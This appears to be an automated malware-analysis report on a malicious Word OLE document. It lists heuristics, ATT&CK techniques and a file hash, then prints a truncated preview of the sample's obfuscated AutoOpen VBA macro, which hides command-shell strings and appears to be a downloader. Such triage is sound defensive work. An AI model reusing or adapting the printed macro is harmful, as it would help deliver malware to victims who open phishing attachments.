Verdict: MALICIOUS
Risk Score: 164
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is a malicious OLE document containing a legacy WordBasic AutoOpen macro. This macro triggers obfuscated VBA code that uses `CreateObject` and appears to be designed to download and execute a second-stage payload. The presence of a large slack space anomaly in the OLE structure is also suspicious.
Heuristics 7
- OLE document has large unaccounted-for region (high, OLE_SLACK_ANOMALY): OLE file is 160,256 bytes but its declared streams total only 48,140 bytes; 112,116 bytes (70%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
- VBA macros detected (medium, OLE_VBA_MACROS, 2 related findings): Document contains VBA macro code.
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro.
- CreateObject call (high, OLE_VBA_CREATEOBJ): CreateObject call.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body).
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 42235 bytes |

SHA-256: 0340c914f83189f1ee4d04ed4876f37f8710bf96cca00bbbdbcf0d981204bcfd

Detection
ClamAV: No threats found
Obfuscation or payload: likely (carved artifact contains 20 long base64-like blob(s))
Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "wlHvQSsw"
Sub AutoOpen()
On Error Resume Next
Select Case icUwoc
Case 66120
jDXitq = Hex(94927 - CSng(40640) - 43252 + ChrW(BfTfv))
zlcvA = HlikaN
End Select
Application.Run "OWfjdYpPFv", TVNTRQBORNh
Select Case BHwTJ
Case 57666
ccFuKa = Hex(88394 - CSng(27835) - 83779 + ChrW(YwhCz))
zmmCw = vJQjBU
End Select
End Sub
Attribute VB_Name = "zIbSjhAZLBA"
Function cYTZXrs()
On Error Resume Next
Select Case chrrI
Case 75359
SFPKwz = Hex(40200 - CSng(92482) - 42592 + ChrW(jQZiK))
rAYIGf = qMjNGB
End Select
wcYknvdzuV = IwsJzD("Vo,cizzQEAMdiRX", 4, 2)
Select Case szradq
Case 44295
aiYIbq = Hex(66433 - CSng(83157) - 89246 + ChrW(SCzrji))
mcZzNk = uqijY
End Select
Select Case VJXjR
Case 76698
jSbhkH = Hex(94050 - CSng(53232) - 84990 + ChrW(tFDUtO))
LZjTk = dvwsiA
End Select
QdiiN = IwsJzD("W4zuSwZZuMzvUKHW F@PN", 5, 13)
Select Case dnYBqR
Case 85027
VuvNzU = Hex(75365 - CSng(56467) - 33119 + ChrW(buIVsH))
wawmo = SbJGF
End Select
Select Case biuQjm
Case 72054
YINRFQ = Hex(45462 - CSng(64872) - 86120 + ChrW(NwbYNP))
LvAzsw = owWbV
End Select
vBpziU = IwsJzD("VnIizzQEA% /V 2aF", 4, 16)
Select Case FwqZi
Case 83131
CusknX = Hex(79421 - CSng(82500) - 70057 + ChrW(CUiTV))
lnfKCc = uwMmd
End Select
Select Case GHiNjS
Case 68783
sfKBN = Hex(44462 - CSng(97836) - 9625 + ChrW(RUisYJ))
EXkupZ = pwuUh
End Select
kamPwYrXdZs = IwsJzD("c6KoizzQEAmizzQEASizzQEApizzQEAEizzQEAc6u6P", 4, 11)
Select Case nMpQGv
Case 20000
TShcj = Hex(2659 - CSng(60510) - 45996 + ChrW(jhwEIJ))
pUTaUD = CRSwF
End Select
Select Case HwbEaj
Case 64715
QrPdfo = Hex(47174 - CSng(40748) - 88487 + ChrW(BkhBzH))
RcDid = jwtJDv
End Select
vwdkGlaIiG = IwsJzD("6oizzQEAmizzQEASizzQEApizzQEAEizzQEAcizzQEA% fsIWFMwz", 2, 18)
Select Case YVhQFN
Case 15968
OiZDcP = Hex(64057 - CSng(97912) - 14789 + ChrW(wUpJD))
Qmzjil = UZLZjC
End Select
Select Case GoINDL
Case 61595
oTdXqf = Hex(95185 - CSng(62920) - 73163 + ChrW(ZfpuSj))
brCim = DhUsiB
End Select
WDEfsLI = IwsJzD("ws0@lmd khbFTwscKSmK2L,u", 6, 15)
Select Case wFzYm
Case 34316
ciRmHM = Hex(13640 - CSng(42663) - 27497 + ChrW(LVbIb))
dTBsZ = VnSfkA
End Select
Select Case oqHIJ
Case 4132
RHXKVj = Hex(54730 - CSng(39751) - 38072 + ChrW(dudpAz))
CcJNi = bVYiqq
End Select
AThfOwZbGHj = IwsJzD("2zu& %izzQEAcizzQEA7iHdMO", 4, 10)
Select Case CPYjY
Case 48711
mYPlK = Hex(36738 - CSng(99271) - 2043 + ChrW(EXnrrF))
sRiivp = FldOZO
End Select
Select Case pkBVNN
Case 5466
sHjwJ = Hex(30481 - CSng(5208) - 9288 + ChrW(FkhhjO))
YRtsHw = LUAttw
End Select
GuLOzp = IwsJzD("Z,zuVZ @n", 7, 1)
Select Case TbaBn
Case 86406
GtJTGF = Hex(67152 - CSng(34136) - 54346 + ChrW(JVVzv))
KRuaX = IWJGql
End Select
Select Case dAZiUr
Case 78812
uLBYWi = Hex(68270 - CSng(14282) - 56991 + ChrW(Rvdsjm))
OYcsM = RNnDMc
End Select
HCpSQGn = IwsJzD("uiiZ JZpoQGcBzWOBHHP Cvt%mn", 3, 19)
Select Case cHONr
Case 55815
riuQdt = Hex(18924 - CSng(4897) - 54123 + ChrW(kRmJF))
MCikk = ifWfR
End Select
Select Case uXBzCX
Case 87652
pIoDS = Hex(15954 - CSng(27562) - 13032 + ChrW(RqrzN))
haiWZA = hbcswq
End Select
hFribGD = IwsJzD("hiCiVt /c 6W", 7, 14)
Select Case Xbhzps
Case 77156
LzIbMA = Hex(49039 - CSng(79138) - 83495 + ChrW(jpTZUA))
XqbNa = MYRwp
End Select
Select Case nVuIhI
Ca
... (truncated)